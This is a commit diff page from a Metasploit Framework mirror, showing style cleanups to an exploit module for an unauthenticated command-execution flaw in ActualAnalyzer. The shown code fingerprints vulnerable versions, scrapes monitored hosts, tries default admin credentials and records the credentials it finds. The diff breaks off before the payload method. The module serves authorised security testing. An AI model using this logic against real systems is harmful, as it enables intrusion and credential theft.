infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Minor ruby style cleanup

bug/bundler_fix
Jon Hart 2014-12-12 09:30:44 -08:00
parent 1d1aa5838f
commit 24f1b916e0
1 changed files with 20 additions and 22 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

42
modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb
View File

@ -1,5 +1,5 @@
## ##
# This module requires Metasploit: http//metasploit.com/download # This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
@ -11,10 +11,11 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(
info,
'Name' => "ActualAnalyzer 'ant' Cookie Command Execution", 'Name' => "ActualAnalyzer 'ant' Cookie Command Execution",
'Description' => %q{ 'Description' => %q{
This module exploits a command execution vulnerability in This module exploits a command execution vulnerability in
ActualAnalyzer version 2.81 and prior. ActualAnalyzer version 2.81 and prior.
The 'aa.php' file allows unauthenticated users to The 'aa.php' file allows unauthenticated users to
@ -47,13 +48,14 @@ class Metasploit3 < Msf::Exploit::Remote
'Privileged' => false, 'Privileged' => false,
'DisclosureDate' => 'Aug 28 2014', 'DisclosureDate' => 'Aug 28 2014',
'DefaultTarget' => 0)) 'DefaultTarget' => 0))
register_options(
[ register_options(
OptString.new('TARGETURI', [true, 'The base path to ActualAnalyzer', '/lite/']), [
OptString.new('USERNAME', [false, 'The username for ActualAnalyzer', 'admin']), OptString.new('TARGETURI', [true, 'The base path to ActualAnalyzer', '/lite/']),
OptString.new('PASSWORD', [false, 'The password for ActualAnalyzer', 'admin']), OptString.new('USERNAME', [false, 'The username for ActualAnalyzer', 'admin']),
OptString.new('ANALYZER_HOST', [false, 'A hostname or IP monitored by ActualAnalyzer', '']) OptString.new('PASSWORD', [false, 'The password for ActualAnalyzer', 'admin']),
], self.class) OptString.new('ANALYZER_HOST', [false, 'A hostname or IP monitored by ActualAnalyzer', ''])
], self.class)
end end
# #
@ -77,8 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote
if !res if !res
vprint_error("#{peer} - Connection failed") vprint_error("#{peer} - Connection failed")
return Exploit::CheckCode::Unknown return Exploit::CheckCode::Unknown
elsif res.code == 200 && res.body =~ /title="ActualAnalyzer Lite \(free\) ([\d\.]+)"/ elsif res.code == 200 && res.body =~ /title="ActualAnalyzer Lite \(free\) (?<version>[\d\.]+)"/
version = $1
vprint_status("#{peer} - Found version: #{version}") vprint_status("#{peer} - Found version: #{version}")
return Exploit::CheckCode::Vulnerable if Gem::Version.new(version) <= Gem::Version.new('2.81') return Exploit::CheckCode::Vulnerable if Gem::Version.new(version) <= Gem::Version.new('2.81')
return Exploit::CheckCode::Detected return Exploit::CheckCode::Detected
@ -116,13 +117,12 @@ class Metasploit3 < Msf::Exploit::Remote
) )
if !res if !res
vprint_error("#{peer} - Connection failed") vprint_error("#{peer} - Connection failed")
elsif res.body =~ /<option value="?[\d]+"?[^>]*>Page: https?:\/\/([^\/^<]+)/ elsif res.body =~ /<option value="?[\d]+"?[^>]*>Page: https?:\/\/(?<analytics_host>[^\/^<]+)/
analytics_host = $1
vprint_good("#{peer} - Found analytics host: #{analytics_host}") vprint_good("#{peer} - Found analytics host: #{analytics_host}")
return analytics_host
else else
vprint_status("#{peer} - Could not find any hosts on view.php") vprint_status("#{peer} - Could not find any hosts on view.php")
end end
analytics_host
end end
# #
@ -138,13 +138,12 @@ class Metasploit3 < Msf::Exploit::Remote
) )
if !res if !res
vprint_error("#{peer} - Connection failed") vprint_error("#{peer} - Connection failed")
elsif res.code == 200 && res.body =~ /alt='ActualAnalyzer' src='https?:\/\/([^\/^']+)/ elsif res.code == 200 && res.body =~ /alt='ActualAnalyzer' src='https?:\/\/(?<analytics_host>[^\/^']+)/
analytics_host = $1
vprint_good("#{peer} - Found analytics host: #{analytics_host}") vprint_good("#{peer} - Found analytics host: #{analytics_host}")
return analytics_host
else else
vprint_status("#{peer} - Could not find any hosts on code.php") vprint_status("#{peer} - Could not find any hosts on code.php")
end end
analytics_host
end end
# #
@ -178,8 +177,7 @@ class Metasploit3 < Msf::Exploit::Remote
vprint_error("#{peer} - Connection failed") vprint_error("#{peer} - Connection failed")
elsif res.code == 200 && res.body =~ />Login</ elsif res.code == 200 && res.body =~ />Login</
vprint_status("#{peer} - Login failed.") vprint_status("#{peer} - Login failed.")
elsif res.code == 200 && res.body =~ /alt='ActualAnalyzer' src='https?:\/\/([^\/^']+)/ elsif res.code == 200 && res.body =~ /alt='ActualAnalyzer' src='https?:\/\/(?<analytics_host>[^\/^']+)/
analytics_host = $1
vprint_good("#{peer} - Found analytics host: #{analytics_host}") vprint_good("#{peer} - Found analytics host: #{analytics_host}")
print_good("#{peer} - Login successful! (#{user}:#{pass})") print_good("#{peer} - Login successful! (#{user}:#{pass})")
service_data = { service_data = {
@ -191,7 +189,7 @@ class Metasploit3 < Msf::Exploit::Remote
} }
credential_data = { credential_data = {
origin_type: :service, origin_type: :service,
module_fullname: self.fullname, module_fullname: fullname,
private_type: :password, private_type: :password,
private_data: pass, private_data: pass,
username: user username: user
@ -205,10 +203,10 @@ class Metasploit3 < Msf::Exploit::Remote
} }
login_data.merge!(service_data) login_data.merge!(service_data)
create_credential_login(login_data) create_credential_login(login_data)
return analytics_host
else else
vprint_status("#{peer} - Could not find any hosts on admin.php") vprint_status("#{peer} - Could not find any hosts on admin.php")
end end
analytics_host
end end
def exploit def exploit